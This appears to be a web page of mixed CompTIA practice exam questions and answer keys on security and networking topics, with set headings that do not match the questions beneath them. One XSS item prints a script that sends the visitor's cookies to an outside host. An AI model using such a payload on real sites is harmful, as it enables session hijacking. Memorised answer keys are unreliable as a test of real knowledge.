CAS-003 CompTIA Advanced Security Practitioner (CASP+) Exam Set 5

The following is what type of attack?

#include

char *code = "AAAABBBBCCCCDDD"; //including the character '\0'

size = 16 bytes

void main()

{char buf[8];

strcpy(buf,code);



Options are :

  • b. CSRF
  • c. SQL injection
  • a. XSS
  • d. buffer overflow

Answer : d. buffer overflow

CompTIA JK0-801 A+ Networking & PC Hardware Practice Exam Set 7

Which of the following is a process in which instructions can be sent remotely to a mobile device to erase all the data when the

device is stolen?



Options are :

  • d. PRL
  • b. SCEP
  • a. memory dump
  • c. remote wipe

Answer : c. remote wipe

What type of attack is illustrated in the following output?

<SCRIPT>

document.location='http://site.comptia/cgi-bin/script.

cgi?'+document.cookie

</SCRIPT>



Options are :

  • a. insecure direct object references
  • b. XSS
  • c. CSRF
  • d. click-jacking

Answer : b. XSS

Which IDS type analyzes traffic and compares it to attack or state patterns that reside within the IDS database?



Options are :

  • b. protocol anomaly-based IDS
  • d. traffic anomaly-based IDS
  • a. signature-based IDS
  • c. rule- or heuristic-based IDS

Answer : a. signature-based IDS

CV0-001 CompTIA Cloud+ Certification Practice Exam Set 6

Which of the following are individual settings in an MDM configuration profile?



Options are :

  • a. payloads
  • b. plug-ins
  • d. wrappers
  • c. signatures

Answer : a. payloads

Which of the following is used to provision certificates to network devices, including mobile devices?



Options are :

  • c. COPE
  • a. SCEP
  • b. BYOD
  • d. OSCP

Answer : a. SCEP

Which attack involves unauthorized access to a device using a Bluetooth connection?



Options are :

  • d. Bluefilling
  • a. Bluesnarfing
  • b. Bluejacking
  • c. Bluefishing

Answer : a. Bluesnarfing

CompTIA PD1-001 PDI+ Beta Certification Practice Exam Set 2

Which of the following is used to manage a device using Telnet?



Options are :

  • c. USB
  • a. data interface
  • d. Bluetooth
  • b. management interface

Answer : b. management interface

Which DAM architecture uses a sensor attached to the database and continually polls the system to collect the SQL statements as they are being performed?



Options are :

  • b. log-based model
  • c. memory-based model
  • d. signature-based model
  • a. interception-based model

Answer : c. memory-based model

Which organization first brought forward the idea of a trusted operating system?



Options are :

  • b. TCSEC
  • c. INTERNIC
  • d. IANA
  • a. IEEE

Answer : b. TCSEC

CompTIA A+ 220 901

Which implementation of DLP is installed at network egress points?



Options are :

  • a. imprecise
  • d. endpoint
  • b. precise
  • c. network

Answer : c. network

Which strategy calls for an organization to purchase mobile devices and the users to manage those devices?



Options are :

  • c. VNC
  • b. BYOD
  • d. RFB
  • a. COPE

Answer : a. COPE

Which of the following is not a safe computing practice?



Options are :

  • b. Enable autorun.
  • a. Perform daily scans.
  • c. Don’t click on email links or attachments.
  • d. Keep anti-malware applications current.

Answer : b. Enable autorun.

FC0-U51 CompTIA IT Fundamentals Certification Exam Set 10

The following is an example of what type of rule set?

iptables -A INPUT -i eth1 -s 192.168.0.0/24 -j DROP

iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP

iptables -A INPUT -i eth1 -s 172. -j DROP


Options are :

  • c. ipconfig
  • d. ipcmp
  • a. iptables
  • b. ipchains

Answer : a. iptables

The following is an example of what type of attack?


Message: Access denied with code 403 (phase 2). Pattern match

"\bunion\b.{1,100}?\bselect\b" at ARGS:$id. [data "union all

select"] [severity "CRITICAL"] [tag "WEB_ATTACK"] [tag

"WASCTC/

WASC-19"] [tag "OWASP_TOP_10/A1"] [tag OWASP_AppSensor/CIE1"]

Action: Intercepted (phase 2) Apache-Handler: php5-script



Options are :

  • b. improper exception handing
  • a. SQL injection
  • d. CSRF
  • c. XSS

Answer : a. SQL injection

Which of the following is a list of radio frequencies residing in the memory of some kinds of digital phones?



Options are :

  • b. PRL
  • c. PRI
  • d. RCP
  • a. VNC

Answer : b. PRL

CompTIA Security+ (SY0-501) Practice Exams with Simulations Set 3

Which IPv4-to-IPv6 transition mechanism assigns addresses and creates host-to-host tunnels for unicast IPv6 traffic when IPv6

hosts are located behind IPv4 network address translators?



Options are :

  • d. Teredo
  • b. 6to4
  • c. dual stack
  • a. GRE tunnels

Answer : d. Teredo

In which type of test is the tester provided with limited knowledge of the network systems and devices, does the tester perform the test using publicly available information only, and does the organization’s security team knows that an attack is coming?



Options are :

  • a. blind
  • d. fuzz
  • b. target
  • c. double blind

Answer : c. double blind

Which testing method injects invalid or unexpected input into an application to test how the application reacts?



Options are :

  • c. white box
  • d. SQL injection
  • b. fuzzing
  • a. MAC spoofing

Answer : b. fuzzing

CompTIA PD1-001 PDI+ Beta Certification Practice Exam Set 27

In what type of web attack does the website think that a request came from the user’s browser and was made by the user himself, when actually the request was planted in the user’s browser?



Options are :

  • a. insecure direct object references
  • c. CSRF
  • d. click-jacking
  • b. XSS

Answer : c. CSRF

Which form of HSM is specifically suited to mobile apps?



Options are :

  • a. USB
  • d. microSD
  • b. serial
  • c. Ethernet

Answer : d. microSD

Which of the following is not a single protocol but a framework for port-based access control?



Options are :

  • d. RDP
  • c. EAP
  • b. CHAP
  • a. PAP

Answer : c. EAP

JK0-015 CompTIA E2C Security+ 2008 Edition Practice Exam Set 5

What services allow for changes to an operating system to be detected by an authorized party?



Options are :

  • c. verification
  • d. bonding
  • a. sealing
  • b. attestation

Answer : b. attestation

Which organization maintains a list of the top 10 attacks on an ongoing basis?



Options are :

  • a. WASC
  • c. BSI
  • d. ISO
  • b. OWASP

Answer : b. OWASP

What design measure is the solution to most XSS and CSRF attacks?



Options are :

  • b. input validation
  • d. ACLs
  • a. iptables
  • c. tripwire

Answer : b. input validation

CT0-101 Convergence+ Certification Practice Exam Set 2

ACLs are susceptible to what type of attack?



Options are :

  • a. MAC spoofing
  • c. whaling
  • b. IP spoofing
  • d. DNS poisoning

Answer : b. IP spoofing

What port number does HTTPS use?



Options are :

  • a. 80
  • b. 443
  • d. 69
  • c. 23

Answer : b. 443

What behavior occurs when an arithmetic operation attempts to create a numeric value that is too large to be represented within the available storage space?



Options are :

  • c. race condition
  • d. memory leak
  • a. integer overflow
  • b. buffer overflow

Answer : a. integer overflow

CompTIA JK0-801 A+ Certification Practical Exam Set 1

Which of the following creates an encrypted area to hold and quarantine corporate data separately from that of the users?



Options are :

  • a. virtualization
  • b. containerization
  • d. VNC
  • c. COPE

Answer : b. containerization

Which of the following is a graphical desktop sharing system that uses the Remote Frame Buffer (RFB) protocol to remotely control another computer?



Options are :

  • d. RCP
  • a. RDP
  • c. NAC
  • b. VNC

Answer : b. VNC

Comment / Suggestion Section
Point our Mistakes and Post Your Suggestions